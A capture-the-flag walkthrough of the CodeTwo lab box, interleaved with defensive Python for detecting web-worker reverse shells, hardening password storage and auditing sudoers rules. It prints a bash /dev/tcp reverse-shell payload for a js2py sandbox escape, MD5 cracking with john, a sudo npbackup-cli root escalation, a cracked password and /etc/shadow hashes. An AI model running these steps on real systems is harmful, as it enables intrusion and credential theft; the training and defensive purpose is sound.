Basic Information

Port Scan

Ports 22 and 8000:

$ nmap -sC -sV -Pn 10.10.11.82
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-22 13:40 JST
Nmap scan report for 10.10.11.82
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a0:47:b4:0c:69:67:93:3a:f9:b4:5d:b3:2f:bc:9e:23 (RSA)
| 256 7d:44:3f:f1:b1:e2:bb:3d:91:d5:da:58:0f:51:e5:ad (ECDSA)
|_ 256 f1:6b:1d:36:18:06:7a:05:3f:07:57:e1:ef:86:b4:85 (ED25519)
8000/tcp open http Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
|_http-title: Welcome to CodeTwo
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.38 seconds

8000

The landing page introduces an open-source project:

Code Editor

Register with any credentials and log in; the site is an online JavaScript code runner:

app

Back on the home page, download the app and inspect the code: JavaScript is executed with js2py, and the requirements file pins js2py==0.74:

js2py to shell

A search turns up the related vulnerability:

Change cmd in the PoC to get a shell as app:

let cmd = "bash -c '/bin/bash -i >& /dev/tcp/10.10.14.6/4444 0>&1'"
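From the defender's side, the interesting artifact in this step is not the PoC but the process tree it produces: a web worker (gunicorn here) spawning a shell whose command line opens a /dev/tcp socket and redirects its file descriptors into it. The following is an added example, not code from the writeup or from the CodeTwo application; it runs simple detection logic over constructed process-execution events of the kind an EDR or auditd-style collector would record (field names and the benign sample rows are assumptions, the suspicious command line is the one shown above).

```python
import re

# Constructed sample process-execution events (not real logs from the box).
# Each event records the process, its parent, and the full command line.
SAMPLE_EVENTS = [
    {"pid": 4123, "parent_comm": "gunicorn", "comm": "bash",
     "cmdline": "bash -c '/bin/bash -i >& /dev/tcp/10.10.14.6/4444 0>&1'"},
    {"pid": 4124, "parent_comm": "gunicorn", "comm": "python3",
     "cmdline": "python3 /home/app/app/app.py"},
    {"pid": 4125, "parent_comm": "sshd", "comm": "bash",
     "cmdline": "bash -c 'grep -r dev/tcp /usr/share/doc'"},
    {"pid": 4126, "parent_comm": "gunicorn", "comm": "sh",
     "cmdline": "sh -c 'id'"},
]

SHELLS = {"sh", "bash", "dash", "zsh"}
WEB_WORKERS = {"gunicorn", "uwsgi", "nginx", "apache2"}

# /dev/tcp/<host>/<port> combined with an fd redirection is the bash built-in
# socket idiom used by the payload above.
DEV_TCP_REDIRECT = re.compile(
    r"/dev/tcp/[\w.\-]+/\d+.*[>&]|[>&].*/dev/tcp/[\w.\-]+/\d+"
)
INTERACTIVE_FLAG = re.compile(r"\b(?:bash|sh)\s+-i\b")


def classify(event):
    """Return the list of reasons this event is suspicious (empty if benign)."""
    reasons = []
    cmd = event["cmdline"]
    # A request-handling worker should never need a shell at all.
    if event["parent_comm"] in WEB_WORKERS and event["comm"] in SHELLS:
        reasons.append("web worker spawned a shell")
    if DEV_TCP_REDIRECT.search(cmd):
        reasons.append("/dev/tcp socket with fd redirection")
    if INTERACTIVE_FLAG.search(cmd):
        reasons.append("interactive shell flag inside a command string")
    return reasons


def detect(events):
    """Return (pid, reasons) for every event that triggers at least one rule."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append((event["pid"], reasons))
    return hits


if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS):
        print(pid, "; ".join(reasons))
```

The first rule alone (web worker spawning a shell) already fires on any command execution reached through the js2py sandbox, regardless of the payload, so it is the one worth keeping even if the other two are tuned down for noise.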

database

Routine digging through the database yields the hashes:

app@codetwo:~/app/instance$ sqlite3 users.db

sqlite> .tables
.tables
code_snippet user
sqlite> select * from user;
select * from user;
1|marco|649c9d65a206a75f5abe509fe128bce5
2|app|a97588c0e2fa3a024876339e27aeb42e

Crack marco's password:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=Raw-Md5

sweetangelbabylove
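The reason rockyou works here is that the user table stores bare, unsalted MD5 digests: every candidate costs one MD5 and identical passwords collide across rows, unlike the salted $6$ (sha512crypt) entries in /etc/shadow further down. As an added example, not the application's code, the block below puts the weak scheme beside a hardened one (PBKDF2-HMAC-SHA256 with a random per-user salt, stored in a self-describing string) and includes a small triage helper that flags dumped rows whose hash column is a bare 32-hex value. The two rows are the ones from the dump above; the hardened format and the iteration count are assumptions of this example.

```python
import base64
import hashlib
import hmac
import os

# Weak scheme as found in users.db: a bare, unsalted MD5 digest.
def weak_hash(password):
    return hashlib.md5(password.encode()).hexdigest()

# Hardened scheme (added example): PBKDF2-HMAC-SHA256, random 16-byte salt,
# high iteration count, parameters stored alongside the digest so they can be
# raised later without a flag day.
ITERATIONS = 600_000


def hash_password(password, salt=None):
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS,
        base64.b64encode(salt).decode(),
        base64.b64encode(dk).decode(),
    )


def verify_password(password, stored):
    try:
        algo, iters, salt_b64, dk_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iters))
    # constant-time comparison: verification timing must not leak digest bytes
    return hmac.compare_digest(dk, expected)


def looks_like_unsalted_md5(stored):
    """Triage helper for a dumped user table: a bare 32-hex value is almost
    certainly an unsalted MD5 (or an equally fast, unsalted) digest."""
    s = stored.strip().lower()
    return len(s) == 32 and all(c in "0123456789abcdef" for c in s)


# Rows from the dump above (id, username, hash).
DUMPED_ROWS = [
    (1, "marco", "649c9d65a206a75f5abe509fe128bce5"),
    (2, "app", "a97588c0e2fa3a024876339e27aeb42e"),
]


def triage(rows):
    """Return the usernames whose stored hash is a bare unsalted digest."""
    return [name for _, name, h in rows if looks_like_unsalted_md5(h)]


if __name__ == "__main__":
    print("accounts with unsalted hashes:", triage(DUMPED_ROWS))
    stored = hash_password("sweetangelbabylove")
    print(stored)
    print(verify_password("sweetangelbabylove", stored))
```

The design point is that a wordlist attack against the hardened format costs 600,000 HMAC iterations per candidate per user, and the random salt means each user's hashes must be attacked separately; the same rockyou run that cracked marco's MD5 becomes impractical.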

user flag

SSH in as marco:

Privilege Escalation Enumeration

The backup angle is obvious: marco is in the backups group and can run npbackup-cli with sudo. Checking the options shows that --external-backend-binary executes an external file:

Privilege Escalation & root flag

So prepare a file containing the command to run, and execute it through --external-backend-binary:

sudo /usr/local/bin/npbackup-cli -c /home/marco/npbackup.conf --external-backend-binary=/tmp/miao/miao.sh --backup
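The root cause here is a sudo rule that names a command without pinning its arguments: sudoers treats a bare command as "any arguments accepted", so a flag like --external-backend-binary that runs another program turns the rule into root code execution. The writeup does not show the actual rule on the box, so the block below is an added example with a constructed sudoers snippet that reproduces the situation (the marco rule is an assumption) next to a rule with its argument list pinned, and a small auditor that reports every rule leaving argument choice to the user.

```python
import re

# Constructed sample sudoers content, not the box's real /etc/sudoers.
# The marco rule is an assumption that reproduces "can sudo npbackup-cli".
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
# no argument list: sudo accepts any arguments, --external-backend-binary included
marco   ALL=(ALL) NOPASSWD: /usr/local/bin/npbackup-cli
# argument list pinned: sudo matches the command line exactly
backup  ALL=(root) NOPASSWD: /usr/local/bin/npbackup-cli -c /etc/npbackup/npbackup.conf --backup
# a trailing "" means the command may only be run with no arguments at all
ops     ALL=(root) NOPASSWD: /usr/bin/systemctl ""
"""

# user host=(runas) spec   (the runas part is optional in sudoers syntax)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$"
)
# Tags that may prefix a command in a Cmnd_Spec.
TAG_RE = re.compile(
    r"^(?:NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC|LOG_INPUT|NOLOG_INPUT|"
    r"LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*"
)


def audit_sudoers(text):
    """Return (user, command, issue) for every rule that lets the user steer
    what runs: ALL, a wildcard in the arguments, or no argument list at all."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user = m.group("user")
        for cmd in (c.strip() for c in m.group("spec").split(",")):
            while TAG_RE.match(cmd):
                cmd = TAG_RE.sub("", cmd, count=1)
            if cmd == "ALL":
                findings.append((user, cmd, "any command"))
            elif "*" in cmd:
                findings.append((user, cmd, "wildcard in arguments"))
            elif cmd.endswith('""'):
                continue  # explicitly no arguments: safe
            elif " " not in cmd:
                findings.append((user, cmd, "no argument list: any arguments accepted"))
    return findings


if __name__ == "__main__":
    for user, cmd, issue in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user}: {cmd}  ->  {issue}")
```

Pinning the arguments closes the --external-backend-binary route, but note that whatever the configuration file can make the tool do, it does as root; the command in the writeup reads /home/marco/npbackup.conf, a file the same user controls, so the pinned rule should point at a root-owned config outside the user's home as the constructed backup rule does.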

shadow

root:$6$UM1RuabUYlt5BQ5q$ZtzAfYOaCaFxA8MGbyH1hegFpzQmJrpIkx7vEIKvXoVl830AXAx1Hgh8r11GlpXgY25LK8wF76nvQYQ1wLSn71:20104:0:99999:7:::
marco:$6$i5xRI7UVqeBITIby$NQKHXVvAWz7Vl3QkEwgxw0ItF9Lwen4gGCBi.YYiDQTdkgcPABaqfmBzheAM/9JA/9J7szqDzPaIDbkNqc.0V.:20022:0:99999:7:::
app:$6$5iH3Zik78QR8t9Se$bgRAig/YjbMzwOTFME629sLrrTn2avVD9pLFwz0X2zBTz0LYfNIEuw6w5s53NNu2K7IeEJK4D6j9PB6SR.UvC0:20022:0:99999:7:::
